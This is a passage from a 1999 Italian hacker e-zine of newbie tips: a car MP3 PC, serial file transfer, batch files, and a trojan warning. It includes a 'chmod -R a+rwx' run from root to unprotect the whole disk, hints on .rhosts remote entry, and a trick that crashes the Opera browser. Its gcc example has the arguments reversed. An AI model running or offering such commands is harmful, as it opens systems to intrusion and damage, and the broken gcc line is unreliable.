quell'impianto sulla mia povera Uno 1000 ??? Secondo me dopo circa 40 secondi di utilizzo l'alternatore (sempre in funzione) si riufiuterebbe di collaborare con la batteria visto il carico Inverter+Alimentatore+Pc+Autoradio+Amplificatori ! Secondo me trovare una soluzione alternativa all'inverter sarebbe una gran cosa. Purtroppo le mie poche e povere nozioni di elettronica non mi permettono di far altro che aspettare qualche aiuto da Voi! Ricordo comunque le tensioni necessarie per un corretto funzionamento: +12,+5,-12,-5 V : chissa' se qualche lettore di newbies puo' darmi una mano! (o un'idea) Se solo si riuscisse a trovare questo aggeggino si potrebbe procedere cosi': (questa e' quasi pura fantasia!) contatti > __________________________________ <-- SchedaAudio/V _______________| |_____________________________< ----- Scheda Madre Si potrebbe sfilare la scheda audio dallo slot ISA e appoggiare la scheda audio sulla scheda madre fissandola adeguatamente. Saldando i contatti dello slot ISA ai contatti della scheda audio si risparmierebbe un casino di spazio!! Se la scheda madre ha l'audio integrato, ovviamente, tutto cio' non e' necessario. Tuttavia la scheda video deve essere ugualmente connessa alla MoBo poiche' il bios fa un Check prima di far partire il Pc. Quindi si dovrebbe ripetere la stessa operazione anche per la scheda video perche' altrimenti il Pc non partirebbe (sigh sigh). . . . . Qualche idea per togliere la Scheda Video??? Booooooooooo Vorrei provare questa "tecnica" dissacrando un vecchio 486 con 8 Mega di Ram senza CD e con un HD removibile da 2,1 Gb (il piatto forte del PC!) : chissa' se ci riusciro'! Be' questa era la parte piu' fantasiosa dell'articolo . . . ora la parte un po' piu' seria. CONFIGURAZIONE HARDWARE / SOFTWARE Secondo la mia opinione spendere un sacco di soldi per un impianto in macchina non vale la pena. Un buon vecchio 486 con 8 Mega di Ram potrebbe essere un buon affare e funzionare egregiamente. Come sistema operativo si potrebbe utilizzare mulinux (una mini distribuzione di linux) installata su Hdd. In alternativa si potrebbe ricompilare un kernel datato (sempre linux) che comunque supporta una SB 100% compatibile. Il kernel un po' vecchiotto garantirebbe il funzionamento dei programmi appositi senza la necessita' di avere svariati mega di ram o un processore pentium. Una configurazione ottimale del OS e' comunque essenziale per la buona riuscita del progetto. Per il sw di utilizzo il grezzo mpg123 o il piu' aggraziato (ma non troppo) freeamp potrebbero andare bene. Da dimenticare (con questa configurazione) programmi + complessi come x11amp o roba simile. Se non siete pratici con linux si potrebbe ottenere lo stesso risultato installando un Dos (meglio se FreeDos) e installare la versione apposita di Winamp per questo sistema operativo (non l'ho ancora vista ma so che e' in giro . . . probabilmente sul sito di Winamp (ma va??)) Be' per anche per questa volta e' tutto. Se ci sara' un seguito a questo articolo e' perche' sono riuscito a fare qualcosa di pratico. Ringrazio Sammy Power per la collaborazione pratica al progetto --- MP3 Fantasy ---. Ogni e-mail in proposito e' gradita all'indirizzo JohnnyRunner@usa.net In chat mi si trova verso le 19.00 o piu' tardi verso le 23.00 Ciao belli! JohnnyRunner ͻ Ŀ L'Uov0 De ColombO ! ٺ ͼ Beh...mini articolo per scrivere un piccolo trucchetto di cui all'inizio pochi conoscono l'esistenza.... deD to: Poll!...alle mie spalle che mi corregge l'articolo in realtime Vs-DeD to:Il treno che alle 16:00 parte...che balle ! Bene...avete un'account su di una freeshell...volete uploadarci un azzo di file ma l'ftp non c'...come fare ??? Aprite il file con il sorgente del file che volete uplodare con il normale notepad selezionate tutto il testo ed ora clickate col destro e scegliete copia. Entrate nella vostra shell, editate un nuovo file con o un qualsiasi altro editor di testo ed incollate il tutto...salvate il file con estensione .c chiudete e poi con gcc o cc o che caxxo volete compilatelo.... ( gcc -o cax.c cax ) ed avrete l'eseguibile di cax....'na stronzata....bye byeeeeee.....D4NT3 4L|GH|3R| !!!!! ͻ Ŀ QUALKE TRUCCO BY PIPPO CALO' ٺ ͼ 1) MINI GUIDA A COME SPROTEGGERE TUTTO IL DISCO E FARE INCAZZARE IL ROOT ;) Questo per sproteggere tutto da tutti da questa directory giu' sotto per tutto l'albero (cioe' tutti i file e le dir degli *nix NOTA BY N0bodY88): chmod -R a+rwx * cd / && chmod -R a+rwx * Anke con questo comando infatti (sono equivalenti) si puo' sproteggere tutto il disco (ma solo se si e' root!!!) 2) MINI GUIDA A && E || COMANDOA && COMANDOB --> esegue il comando B solo se e' riuscito ad eseguire il comando A COMANDOA || COMANDOB --> esegue il comando B solo se NON e' riuscito ad eseguire il comando A 3) MINI GUIDA CON PRECISAZIONI SUI FILE .RHOSTS Il file .rhosts deve essere protetto PERLOMENO da scrittura contro g e o. Altrimenti non funziona l'entrata in remote. Temo anche che debba essere protetto da lettura. ͻ Ŀ UN PO' TRUCCHI CAZZATE E STRONZATE ٺ ͼ Ciao a tutti questo e' il vs N0bodY88 che vi parla dal suo portatile datogli in dotazione da una ditta che evidentemente se ne intende di pazzi hihihi. In queste poche righe vi daro' alcuni consigli non difficili e di sicuro non inediti ma che forse possono risultare utili. Eccoveli divisi in punti: 1) Immaginate di aver trovato posto in un azienda dove avete la vostra scrivania e il vostro telefono personale ma che si collega ad un centralino: ebbene come fare x connettersi ad internet? Per "scavalcare" (diciamo) il centralino basta far precedere il numero telefonico del vs provider nella vostra connessione di acceso remoto uno zero con due virgole. Esempio: --> connessione da casa --> 06880000 --> connessione dall'ufficio --> 0,,0688000 Semplice no ;) 2) come collegare 2 computer che non hanno schede di rete? Allora la soluzione e' semplice basta munirsi di un semplice cavetto uplink che andra' a connettere i due pc ( ovviamente =) ) sulla porta com1 o, tramite adattatore, alla com2 dopodiche' bastera' mandare in esecuzione su entrambi i pc collegati un programmino che si chiama LL3 e che potete trovare allegato al cavo seriale o che potete cmq procurarvi facilmente o sulla rete o mediante qualke amico smnanettone che abbia anke un minimo interesse sulle reti. Nel programma sopracitato LL3 basta: --> premere L e poi premere invio x muoversi dentro e fuori le varie dir --> premere C e poi premere invio x copiare file da un pc all'altro --> premere E e poi premere invio x cancellare dei file CONSIGLIO: se uno dei due pc e' un 486 e' consigliabile copiare un file alla volta...lo so...e' un po' na menata pero' cosi' non si impalla a causa della differenza di velocita' dei due pc... ;) 3) cosa fare nei momenti di noia in rete quando gli amici non ci sono e di hackare non c'avete la testa? Semplicemente passarsi sotto teleport i vari www.softpj.com e www.spippolatori.com senza lasciare neanche una immagine che poi se se ne accorgono vi fanno a fette hihihi e ricodate che noi impariamo x creare e non per rompere o cancellare. 4) ATTENZIONE !!! Se girate su irc state attenti che c'e' un buontempone che va in giro e domanda "vuoi vedere un mio video" il che non sarebbe rompiballe senonche' il video mandato da questo fantomatico simpaticone si rivela essere un file chiamato patch.exe che potete immaginare cos'e'...cmq il consiglio e' il solito okkio a non aprire niente che derivi da sconosciuti e okkio ai "re degli hacker" come questo =) tnx speciale a dante x la segnalazione di questo "pericolo pubblico" hihihi 5) Cosa e' un array ? So che e' una cazzata ma dato che ultimamente me l'hanno gia' chiesto in tre o quattro e quindi... Gli array sono strumenti utilizzati x memorizzare gruppi di elementi in una singola unita'. Gli array quindi sono in pratica degli insiemi di elementi aventi una comune caratteristica. Immaginate di fare un programma nel vostro linguaggio di programmazione preferito e di dover immettere in un database decine se non centinaia di dati dello stesso tipo (variabili numeriche, variabili di testo etc.)...cosa fate? Fate decine di dichiarazioni oppure (e qui vengono in aiuto gli array) create con una unica dichiarazione un insieme di dati che contiene tutti i vs dati in un unico array :) 6) Non dormite la notte all'incubo che qualcuno vi incul... vi invada l'orifice con qualke trojan o che vi entri nel vs win preferito e che vi formatti tutto? Niente paura c'e' un trucco semplicissimo x evitare questo e x dormire sonni tranquilli... tutto questo puo' essere infatti evitato con un passo semplicissimo ma anke un po' ingegnoso (e che, ci tengo a precisarlo, non lo ho inventato io e credo lo sappiano gia' in tanti). Basta infatti andare nella nostra cartella c:\windows\command e rinominare il ns buon vecchio format.com in formatt.com o cax.com o quellochevolete.com...sta a voi decidere e buone nottate ;) PS: si ringrazia Yago - Eugenio per avermi arrichito la conoscenza con questo trucchetto semplice (se non lo sai ;) ma moooooooooolto efficace. 7) Ed ora un piccolo trcchetto x quelli che creano e programmano in java e hanno appena cominciato e stanno usando un compilatore sotto dos. Il trucco consiste nel mettere le seguenti linee in un file e chiamarlo a.bat dopodiche' basta che quando volete provare un progetto appena finito basta che digitiate il comando "a nomemioprogetto" e uala'! ci siamo risparmiati un bel po' di ------inizio copiaincolla-------------------- @echo off cls path c:\jbuilder\java\bin c:\jbuilder\java\bin\javac.exe %1.java c:\jbuilder\java\bin\appletviewer.exe %1.html ------fine copiaincolla---------------------- !!!!!!ATTENZIONE IL PROSSIMO TRUCCO NON E' MIO MA E' UNA TRADUZIONE!!!!!! 8) Come mandare in crash il "famoso" browser web Opera? Ebbene basta una piccola cosa x far andare in crash sudetto programma e consiste nell'aggiungere un ulteriore slash a un qualsiasi indirizzo web. Piccolo esempio: http:/// PS: non so pero' se nelle ultime versioni ci sia ancora questo bug quindi che mi resta da dire oltre al fatto che l'autore del testo che ho tradotto non e' riportato nel testo stesso? Ah si'... ...tentar non nuoce...e com dice un amico di un mio amico mooolto maschilista (ma dire mooooolto e' dire poco) dice sempre "Tu vai dalla ragazza lo tiri fuori dalle mutande e glielo metti in mano... tanto qualsiasi cosa succeda non cade ;) E anche questo numero il mio art su cazzate trucchi e stronzate e' finito... ...quindi.. ...byez a tutti dal vostro redivivo N0bodY88 ͻ Ŀ SALUTI ٺ ͼ Dedico questa e-zine a K4m4l30nt3, colui con il quale ho iniziato questa avventura e che ora non e' piu' tra noi.... dovunque tu sia questa e' per te fratello _--={ (^__^) }=--_ Io sono un newbies e questo e' il mio manifesto. Potete anche fermare me, ma non potete fermarci tutti... dopo tutto, siamo tutti curiosi uguali e con la stessa voglia di smanettare e di capire. +++Illo N0bodY88+++ January 16, 1999 Ok ora voglio fare anche io un mega salutone a Dark Schnaider [ complimenti x il sito ] , Biavo , w00w00 e tutti gli altri amici mirc che frequentemente vengono sul nostro beneamato canale #hackernow [ grazie di tutto cuore siete mitici ] . Ah mi dimenticavo una cosa .... Fanculo ai Lamer siete esseri immondi .... Come sono buono eh.. Io sono un newbies e questo e' il mio manifesto. Potete anche fermare me, ma almeno aspettate che abbia fermato tutti i lamer di questo universo, dopo tutto non siamo tutti uguali ZeroCool _ _ ____ _ | \ | | _____ _| __ )(_) ___ ___ | \| |/ _ \ \ /\ / / _ \| |/ _ Y __| | |\ | __/\ V V /| |_) | | __|__ \ |_| \_|\___| \_/\_/ |____/|_|\___|___/ Webmaster by ---------> ZeroCool & T0rment0 & _p0nic0_ & HaRLoK & N0bodY88 Redattori ------------> N0bodY88 & ZeroCool & Dante Alighieri E-zine by ------------> N0bodY88 & ZeroCool & NewBies Staff Ascii by -------------> N0bodY88 & |-|15cR4zYm1nD & S0l1t4r10~M4N & 1mGvD Loghi NewBies by -----> RigoR MorteM Articoli -------------> NewBies Staff & Friends |-_-|-_-|-_-|-_-|-_-|-_-|-_-|-_-|-_-|-_-|-_-|-_-|-_-|-_-|-_-|-_-|-_-|-_-|-_-|- Fine e-zine: E anche questo numero e' giunto alla frutta quindi che dire...speriamo che vi sia piaciuto...e ora un po' di cose...buon compleanno a Raffi Crash....un grazie di cuore a drwxr-xr- x tutto il suo aiuto x NewBies e x la sua amicizia dimostrata in vari modi...tnx in modo molto speciale sia a Yago il mito che a RigoR MorteM che adesso mi ha pure trasmesso la passione x l'elettronica... cax che figata raga... N0bodY88